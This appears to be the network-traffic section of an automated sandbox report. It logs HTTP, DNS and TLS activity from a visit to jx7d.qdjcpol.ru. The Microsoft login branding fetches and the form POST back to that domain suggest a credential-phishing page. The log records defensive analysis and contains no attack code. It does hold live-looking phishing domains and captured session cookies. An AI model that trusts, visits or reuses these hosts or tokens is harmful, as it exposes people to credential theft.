                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/illustration?ts=637580027298952703 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsCzCTvhuXE1rP0onyzkewx36 HTTP/1.1Host: xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rvc8hP5OiiRCTBRKrpSWcixJnab1LN0CtOzu45Y5NSG36o4V3zhPkzoC4r7vgz HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktZem9OYWVYTjZHS0UzQ0ZpRmZhaHc9PSIsInZhbHVlIjoiZDRScllZbE8wUmVsS3kxZ0RzWG5LVTF0YWZleVE3Rm9XUVdWNnNKd1pCbncrQ2pVUmRtdUhZZWEvNVVpTndWYUxrelp3c3pUenhYdWJ2TXhrQ1BVVGg1WU1MeDExU2ZvdCtwS1owWExHUjBqajBNaW1FMmliQmdUa3BENTB5UnMiLCJtYWMiOiIxNjBlMTc3MDcxNDEwMTMyOWJhZGUwMmQzMjQwNjYxNjNmNTk0OTIxOTExMGE0ZWIxODcyYWEyZDY3NTJiNzBkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InkydmdwQSt3NkxPNjRHV3RPL3kzL2c9PSIsInZhbHVlIjoiUGVONjg5UDkyeWxCSjNHcVZnaHZOa3NSQTNBN3ZrUDcwN2tOVFFVdDNkTkhvUGtwUEYwajNhMkp1Skx2azlQRVlBVTRsMGVkZ2ZKMTZsMWZDazY5WWdVUi96em5HcGExaXY5ZkQ4VzJTUmFLcUo2cGRWRVNHcG1Gd3hKVU1CZlIiLCJtYWMiOiI3Nzc3ZTMwN2Y0ZTdmZmMzZThhY2FhZjMyOGMyNjg4NWU3YWIxNTIzYzdmNTBjMGMxYWQ5NGU4OWMxNWZmYTIwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQyzIHE7onfGy78LooHop50 HTTP/1.1Host: xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficDNS traffic detected: DNS query: jx7d.qdjcpol.ru
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: vk3z.qxwhvv.ru
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: get.geojs.io
                Source: global trafficDNS traffic detected: DNS query: xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es
                Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
                Source: unknownHTTP traffic detected: POST /yvXjoYkmQFZJWf6TvRNY1h HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveContent-Length: 774sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoQkFx19e05NIAGiFsec-ch-ua-mobile: ?0Accept: */*Origin: https://jx7d.qdjcpol.ruSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://jx7d.qdjcpol.ru/WpB8P/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikt5SkVHVlZHVlA3Z2lQRzRWU0hQNHc9PSIsInZhbHVlIjoid3NXTWJCY0xrMi96VWJLK3ZSU0RrMk55RjBZd1gxOUhEeTc5SGFwTHJ4Z3pQVWkvNndITzZjbVh2ait1R1NoMHNSdmJSd1VzK1RKOUhOMlViWjA1aGN6ckE0K0xMMEpQMENYVjg0dVdaY2N1SUQ3NkZCZWZCWmFGMmxGZmdiVUsiLCJtYWMiOiI4YTQ3MTM4NTYzN2E0MTdjNzdmY2E4NWNhNmRiNDljOTkwNmFkMmEwNTEzZTQ5ZmRlYjZiNDQxYWQ0YmFjY2ZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlNmaWk1VnB1UTBUcEhRazNiemErUkE9PSIsInZhbHVlIjoiWUhoYjNxMjhTQVNpMGUxd3Nna2c5bzFxOFRWdlVoNXJRUnRnZStvWXlFam83ejhqT1VaMEhXTXJOVEVVb1I1Qmp4OG1BaDV3bmdPV3ppem5mNmNqT3lPNW9Pa0dzL1VZV0ZTN0RUTmRNcUlIRFJrekJWL1YxaW55NFJsODBReDciLCJtYWMiOiIyM2Y0YmZhNTUyNDc2NTJlYjcxOWY1YzI4ZmViNmIzNmY2YjNlZTk0YmMwZGM3OWI2NTZhMTI5NjlhODM0OTdjIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 09:48:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VoiCO4HJGLEb%2Fq4mjvpak6j1iaxn3A5ycNP31mneisOjWSjVbLClkoERWUAMwF9s1%2FXkHcwQtUv6SYqxxBMV7epbkh4BLwK1qLWKdb%2BMJQruozf64qk5F%2F34KpV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=18621&min_rtt=18610&rtt_var=5244&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2032&delivery_rate=216987&cwnd=252&unsent_bytes=0&cid=3f4a73fca1c2d311&ts=196&x=0"Server: cloudflareCF-RAY: 922c0e181a14dcc1-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=626&min_rtt=618&rtt_var=238&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1696&delivery_rate=4686084&cwnd=238&unsent_bytes=0&cid=cc227900a2925d6e&ts=492&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 09:48:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRpKB8sMTYj556fNWu6jvbaoVlx1DmQwoH1ksy%2Fh0R6coGvOEBBR7oE9FVRzeave0mvdXfxRwBahhViqbb5rwt50jufSdRL9OZ7HQsORk%2Fyq7ruYoNXcriEFS7gH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=362&min_rtt=353&rtt_var=116&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2231&delivery_rate=10160804&cwnd=252&unsent_bytes=0&cid=2bab914282de2818&ts=172&x=0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 113Server: cloudflareCF-RAY: 922c0e1c5e51371c-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=776&min_rtt=709&rtt_var=314&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1894&delivery_rate=4084626&cwnd=236&unsent_bytes=0&cid=bb53cd712fd45782&ts=36&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 09:48:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYboOP8AwOT45dbo9%2BMnaYCB5pdzQfUZ3JwdYaLOjD2RNKK8mcS0MDMm4e%2F%2FTJWHBLsybFDzA3tM9vsXOx9cbRR6Y41PwKYJa1%2FpAUAEda6ErOm%2BliR6k%2BF5OxdB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=16253&min_rtt=16192&rtt_var=4597&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2045&delivery_rate=249275&cwnd=252&unsent_bytes=0&cid=da4682dcdb8f8223&ts=204&x=0"Server: cloudflareCF-RAY: 922c0e1f1fda37d4-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=519&min_rtt=512&rtt_var=197&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1709&delivery_rate=5656250&cwnd=236&unsent_bytes=0&cid=01b215a30d131570&ts=516&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 09:48:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fsyhXuFJzlMlL7eBT69UiBsrDtrPtxfX045ewke%2BjJNC9gGGABG0O87AM2RN5ztrTgpwHY56QECwcQKIMd6mrMMkbbDAd9GxWcTEjNsF67Tl9nYG%2BMnCG6uvjRI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=300&min_rtt=290&rtt_var=100&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2072&delivery_rate=11620689&cwnd=252&unsent_bytes=0&cid=1f4c3c8387e72dce&ts=168&x=0"Server: cloudflareCF-RAY: 922c0e2aff4a65c6-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=451&min_rtt=443&rtt_var=172&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1736&delivery_rate=6537246&cwnd=241&unsent_bytes=0&cid=e092e39af28c6527&ts=458&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Mar 2025 09:49:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZvk51RHJt%2FFZ80jm8dXbtTGadxkWoNHClEVyhlZkBX6xOkYngWc3l%2FhzvmMpgy3OkPO6qU%2Bw3rC5LDglcT%2FPlEoW3ivlTIXs05Fs7O4iv0p6tWEp4ztT996%2B55h"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=365&min_rtt=323&rtt_var=130&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2073&delivery_rate=9087640&cwnd=252&unsent_bytes=0&cid=2c0f2f510232367a&ts=193&x=0"Server: cloudflareCF-RAY: 922c0ec14c054d44-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=470&min_rtt=465&rtt_var=186&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1736&delivery_rate=5656250&cwnd=240&unsent_bytes=0&cid=efa70d62e57c3372&ts=476&x=0"
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 104.21.78.6:443 -> 192.168.2.16:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.36:443 -> 192.168.2.16:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.78.6:443 -> 192.168.2.16:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.16:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49741 version: TLS 1.2
